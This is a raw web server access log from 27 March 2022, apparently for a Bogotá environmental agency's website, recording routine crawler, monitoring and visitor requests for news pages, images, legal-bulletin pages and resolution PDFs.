69.171.249.1 - - [27/Mar/2022:10:45:56 -0500] "GET /mas-de-21-kilogramos-de-residuos-especiales-y-peligrosos-fueron-entregados-en-bosa.html HTTP/1.1" 206 979
69.171.249.116 - - [27/Mar/2022:10:45:56 -0500] "GET /mas-de-21-kilogramos-de-residuos-especiales-y-peligrosos-fueron-entregados-en-bosa.html HTTP/1.1" 206 979
207.46.13.43 - - [27/Mar/2022:10:46:09 -0500] "GET /bla/resoluciones/resoluciones%202021/5508.pdf HTTP/1.1" 200 412122
216.245.221.92 - - [27/Mar/2022:10:47:20 -0500] "HEAD / HTTP/1.1" 200 -
20.191.45.212 - - [27/Mar/2022:10:48:35 -0500] "GET / HTTP/1.1" 200 319
20.191.45.212 - - [27/Mar/2022:10:48:35 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.73.127 - - [27/Mar/2022:10:48:47 -0500] "-" 408 -
173.252.79.18 - - [27/Mar/2022:10:49:09 -0500] "GET /images/feria-servicios-principal-24-marzo.jpg HTTP/1.1" 200 37032
207.46.13.179 - - [27/Mar/2022:10:49:22 -0500] "GET /bla/resoluciones/resoluciones%202021/5489.pdf HTTP/1.1" 200 324072
172.22.2.4 - - [27/Mar/2022:10:48:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:49:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
69.171.249.5 - - [27/Mar/2022:10:51:50 -0500] "GET /images/rueda-prensa-lluvias-secretaria-principal-23-marzo.jpg HTTP/1.1" 200 42664
216.245.221.92 - - [27/Mar/2022:10:52:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:51:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
66.249.73.127 - - [27/Mar/2022:10:52:36 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:10:54:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [27/Mar/2022:10:55:59 -0500] "-" 408 -
49.7.21.74 - - [27/Mar/2022:10:56:11 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:10:54:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
181.237.42.244 - - [27/Mar/2022:10:57:05 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
216.245.221.92 - - [27/Mar/2022:10:57:20 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.46 - - [27/Mar/2022:11:00:32 -0500] "GET /bla/resoluciones/resoluciones%202021/5502.pdf HTTP/1.1" 200 399396
172.22.2.4 - - [27/Mar/2022:10:59:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [27/Mar/2022:11:02:00 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:11:02:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:00:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [27/Mar/2022:11:01:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
173.252.107.14 - - [27/Mar/2022:11:03:01 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
173.252.79.20 - - [27/Mar/2022:11:04:33 -0500] "GET /images/llantaton-jornada.jpg HTTP/1.1" 200 356045
181.237.42.244 - - [27/Mar/2022:11:04:59 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
181.61.160.248 - - [27/Mar/2022:11:05:17 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
181.61.160.248 - - [27/Mar/2022:11:05:20 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.237.42.244 - - [27/Mar/2022:11:06:10 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
217.182.171.12 - - [27/Mar/2022:11:07:02 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202010/1675.pdf HTTP/1.1" 200 -
216.245.221.92 - - [27/Mar/2022:11:07:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:05:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:06:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.73.127 - - [27/Mar/2022:11:08:25 -0500] "-" 408 -
173.252.95.3 - - [27/Mar/2022:11:11:13 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 206 911
31.13.103.23 - - [27/Mar/2022:11:11:15 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
31.13.103.17 - - [27/Mar/2022:11:11:15 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
173.252.95.120 - - [27/Mar/2022:11:11:15 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
69.63.189.117 - - [27/Mar/2022:11:11:16 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
173.252.95.10 - - [27/Mar/2022:11:11:16 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 206 911
31.13.115.25 - - [27/Mar/2022:11:11:17 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html?fbclid=IwAR2tz7_1AXuWs1OJyGmsHFG4pawCJovMTlFnZY2Uqk2_ov-YU-loleUCp9g HTTP/1.1" 200 911
18.210.147.12 - - [27/Mar/2022:11:11:45 -0500] "HEAD /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 -
173.252.107.118 - - [27/Mar/2022:11:12:09 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
216.245.221.92 - - [27/Mar/2022:11:12:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [27/Mar/2022:11:12:25 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
49.7.21.74 - - [27/Mar/2022:11:12:31 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:11:12:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
172.22.2.4 - - [27/Mar/2022:11:11:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:12:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
66.249.73.127 - - [27/Mar/2022:11:14:52 -0500] "-" 408 -
207.46.13.186 - - [27/Mar/2022:11:15:14 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/tunel-ambiente-6-junio-150x150.jpg HTTP/1.1" 200 7153
186.102.16.204 - - [27/Mar/2022:09:31:01 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 400 1022
31.4.206.104 - - [27/Mar/2022:11:15:38 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
31.4.206.104 - - [27/Mar/2022:11:15:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
31.4.206.104 - - [27/Mar/2022:11:15:38 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
31.4.206.104 - - [27/Mar/2022:11:15:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
31.4.206.104 - - [27/Mar/2022:11:15:44 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
31.4.206.104 - - [27/Mar/2022:11:15:44 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
31.4.206.104 - - [27/Mar/2022:11:15:44 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.154.32.188 - - [27/Mar/2022:11:16:31 -0500] "GET /programa-mujeres-que-reverdecen-tiene-cerca-de-200-cupos-disponibles.html HTTP/1.1" 200 1059
172.22.2.4 - - [27/Mar/2022:11:15:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63729
216.245.221.92 - - [27/Mar/2022:11:17:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:17:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:18:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60105
66.249.73.127 - - [27/Mar/2022:11:21:07 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:11:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43853
216.245.221.92 - - [27/Mar/2022:11:22:20 -0500] "HEAD / HTTP/1.1" 200 -
103.178.236.95 - - [27/Mar/2022:11:22:22 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
201.245.192.253 - - [27/Mar/2022:11:21:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42123
190.26.164.238 - - [27/Mar/2022:11:22:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.26.164.238 - - [27/Mar/2022:11:22:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 336570
201.245.192.253 - - [27/Mar/2022:11:21:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
157.55.39.218 - - [27/Mar/2022:11:22:56 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 299140
172.22.2.4 - - [27/Mar/2022:11:23:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:25:19 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [27/Mar/2022:11:25:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1500
172.22.2.4 - - [27/Mar/2022:11:24:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
66.249.73.127 - - [27/Mar/2022:11:26:59 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:11:27:20 -0500] "HEAD / HTTP/1.1" 200 -
42.236.10.106 - - [27/Mar/2022:11:29:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [27/Mar/2022:11:29:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:11:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43853
172.22.2.4 - - [27/Mar/2022:11:29:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
49.7.21.74 - - [27/Mar/2022:11:32:11 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:11:32:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:11:31:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42123
201.245.192.253 - - [27/Mar/2022:11:31:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
66.249.73.127 - - [27/Mar/2022:11:32:45 -0500] "-" 408 -
173.252.127.118 - - [27/Mar/2022:11:36:36 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
31.13.103.7 - - [27/Mar/2022:11:36:36 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
173.252.95.15 - - [27/Mar/2022:11:36:36 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
172.22.2.4 - - [27/Mar/2022:11:34:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.141.234.52 - - [27/Mar/2022:11:37:05 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [27/Mar/2022:11:37:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:35:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
66.249.73.127 - - [27/Mar/2022:11:38:27 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:11:40:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43853
172.22.2.4 - - [27/Mar/2022:11:41:55 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
216.245.221.92 - - [27/Mar/2022:11:42:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:11:41:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42123
201.245.192.253 - - [27/Mar/2022:11:41:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
172.22.2.4 - - [27/Mar/2022:11:40:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.157 - - [27/Mar/2022:11:42:51 -0500] "GET /bla/resoluciones/resoluciones%202021/5506.pdf HTTP/1.1" 200 383826
172.22.2.4 - - [27/Mar/2022:11:41:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.73.127 - - [27/Mar/2022:11:45:37 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:11:47:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:46:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:47:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
66.249.73.127 - - [27/Mar/2022:11:51:15 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:11:52:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:11:51:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
40.77.167.61 - - [27/Mar/2022:11:53:23 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [27/Mar/2022:11:52:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:53:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
49.7.21.74 - - [27/Mar/2022:11:55:00 -0500] "-" 408 -
191.156.60.140 - - [27/Mar/2022:11:55:37 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.58.40 - - [27/Mar/2022:11:55:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.49.192 - - [27/Mar/2022:11:55:38 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [27/Mar/2022:11:56:01 -0500] "GET /BLA/boletinlegal/directivas/2018/directiva%20no.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
216.245.221.92 - - [27/Mar/2022:11:57:20 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [27/Mar/2022:11:58:08 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:11:59:20 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1037
172.22.2.4 - - [27/Mar/2022:11:59:22 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%202%20del%2014%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 113666
172.22.2.4 - - [27/Mar/2022:11:59:33 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 2146608
172.22.2.4 - - [27/Mar/2022:11:58:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:11:59:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [27/Mar/2022:12:02:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:12:01:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106276
66.249.73.127 - - [27/Mar/2022:12:04:50 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:12:04:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:04:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
216.245.221.92 - - [27/Mar/2022:12:07:20 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [27/Mar/2022:12:08:49 -0500] "GET /BLA/images/pdf.gif HTTP/1.1" 404 1018
66.249.73.127 - - [27/Mar/2022:12:10:40 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:12:09:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Mar/2022:12:12:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:10:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
201.245.192.253 - - [27/Mar/2022:12:12:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106284
172.22.2.4 - - [27/Mar/2022:12:14:24 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61796
66.249.73.127 - - [27/Mar/2022:12:16:35 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:12:17:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:15:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:16:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
103.178.236.95 - - [27/Mar/2022:12:18:47 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
207.46.13.43 - - [27/Mar/2022:12:18:48 -0500] "GET /BLA/resoluciones/AUTOS%202018/2755.pdf HTTP/1.1" 304 -
172.22.2.4 - - [27/Mar/2022:12:19:18 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [27/Mar/2022:12:19:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
49.7.21.74 - - [27/Mar/2022:12:21:04 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:12:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44550
216.245.221.92 - - [27/Mar/2022:12:22:20 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [27/Mar/2022:12:22:21 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:12:21:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106284
201.245.192.253 - - [27/Mar/2022:12:21:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42131
172.22.2.4 - - [27/Mar/2022:12:22:35 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
172.22.2.4 - - [27/Mar/2022:12:21:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:22:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
40.77.167.41 - - [27/Mar/2022:12:27:10 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/visor-geofragico-aulas-ambientales-27-abril-1200x480.png HTTP/1.1" 200 639131
216.245.221.92 - - [27/Mar/2022:12:27:20 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [27/Mar/2022:12:28:05 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:12:27:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.157 - - [27/Mar/2022:12:29:34 -0500] "GET /galeria/galeria/fotos/Huemdal-Cordoba1G.jpg HTTP/1.1" 200 379768
172.22.2.4 - - [27/Mar/2022:12:28:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
201.245.192.253 - - [27/Mar/2022:12:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44550
190.26.164.238 - - [27/Mar/2022:12:31:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.26.164.238 - - [27/Mar/2022:12:31:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 336570
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [27/Mar/2022:12:32:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [27/Mar/2022:12:32:09 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
